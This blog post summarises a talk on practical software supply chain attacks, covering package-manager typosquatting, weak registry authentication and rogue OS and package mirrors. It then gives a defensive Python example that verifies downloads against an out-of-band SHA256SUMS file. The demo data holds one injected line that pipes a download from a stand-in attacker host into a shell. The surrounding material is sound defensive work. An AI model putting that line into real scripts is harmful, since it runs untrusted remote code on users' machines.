# Supply Chainsaw: Practical software supply chain attacks for everyone
I recently presented Supply Chainsaw: Practical software supply chain attacks for everyone at the OPCDE technical security conference in Dubai.
In between pictures of Sharknadoes and memes was an array of software supply chain attacks:

- We proved that most programming-language package managers have major security weaknesses:
  * Typo or wrong-command attacks compromise anyone who makes a mistake installing a package
  * Anonymous, automatic registration and publishing make attacks easy
  * Authentication is weak: no two-factor, and sometimes none at all
  * Developers of popular open-source packages, and their powerful credentials, are exposed to many different attacks through the development process and permanent credential caching
- Operating-system package repositories are manually reviewed and harder to poison
- But nearly every OS is acquired insecurely and is unlikely to be verified by the user, from Linux to Mac OS to Windows
- MITM attacks proved practical against proxy/VPN/Tor users: over 5,000 potential opportunities to poison executable downloads in my test
- We became OS and package mirrors to prove that:
  * Anyone could infect packages and OSes delivered via a mirror
  * It can be quick, cheap and anonymous, with worldwide effect
  * Packages are often not verified against anything external to the mirror
  * We were never denied anything we asked for
  * We run honest mirrors, but we have no guarantee that others are trustworthy or have not been compromised
- Between hundreds and millions of users can be compromised using these techniques
- Supply chain attacks are happening in the wild now
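As a concrete counter to the mirror findings above (packages not verified against anything external, OS images acquired without verification), here is the check a consumer should perform: compare what a mirror delivers against a SHA256SUMS file obtained from the upstream project out of band, not from the mirror itself. This is example code written for this page, not code from the talk or from any mirror project; the `SHA256SUMS` line format (`<hex digest>  <filename>`, as Debian and Ubuntu publish for ISO releases), the mirror hostnames and the package bytes are all constructed for the demo.

```python
"""Verify mirror-delivered artifacts against an out-of-band SHA256SUMS file.

Added example, not code from the talk. Assumes the upstream project publishes
a SHA256SUMS file ("<hex digest>  <filename>" per line) that you fetch over a
channel the mirror cannot tamper with (the project's own HTTPS site, or a
copy whose detached signature you verify with the project's key).
"""
import hashlib
import hmac
import re

# One entry per line; an optional leading '*' marks binary mode in coreutils output.
SUMS_LINE = re.compile(r"^([0-9a-fA-F]{64})\s+\*?(\S+)$")


def parse_sha256sums(text: str) -> dict[str, str]:
    """Parse SHA256SUMS text into {filename: lowercase hex digest}."""
    digests = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = SUMS_LINE.match(line)
        if not m:
            raise ValueError(f"malformed SHA256SUMS line: {line!r}")
        digests[m.group(2)] = m.group(1).lower()
    return digests


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_artifact(name: str, data: bytes, digests: dict[str, str]) -> bool:
    """True only if `data` matches the out-of-band digest recorded for `name`.

    A file with no entry in the sums file is treated as unverified (False),
    never as a pass. hmac.compare_digest keeps the comparison constant-time.
    """
    expected = digests.get(name)
    if expected is None:
        return False
    return hmac.compare_digest(sha256_hex(data), expected)


# --- constructed demo data (not real packages or real mirrors) ---
GENUINE = b"#!/bin/sh\necho install genuine package\n"
POISONED = (b"#!/bin/sh\n"
            b"curl -s http://attacker.invalid/x | sh\n"   # injected by a rogue mirror
            b"echo install genuine package\n")

# What the upstream project publishes out of band; derived from the genuine
# bytes here only so the example runs offline.
SHA256SUMS = f"{sha256_hex(GENUINE)}  install-1.0.sh\n"

# What two mirrors hand back for the same filename.
MIRRORS = {
    "honest-mirror.example": {"install-1.0.sh": GENUINE},
    "rogue-mirror.example": {"install-1.0.sh": POISONED},
}


def fetch_and_verify(mirror: str, name: str) -> bool:
    """Simulate downloading `name` from `mirror` and checking it before use."""
    data = MIRRORS[mirror][name]
    return verify_artifact(name, data, parse_sha256sums(SHA256SUMS))


if __name__ == "__main__":
    for mirror in MIRRORS:
        status = "OK" if fetch_and_verify(mirror, "install-1.0.sh") else "REJECTED"
        print(f"{mirror}: {status}")
```

The honest mirror's file verifies and the rogue mirror's file is rejected. The check is only as good as where the digests came from: a SHA256SUMS served by the same mirror as the artifact proves nothing, because whoever swapped the package can regenerate the sums. Fetch it from the upstream project directly, or verify its detached signature (for example with `gpg --verify`) against a key you obtained independently.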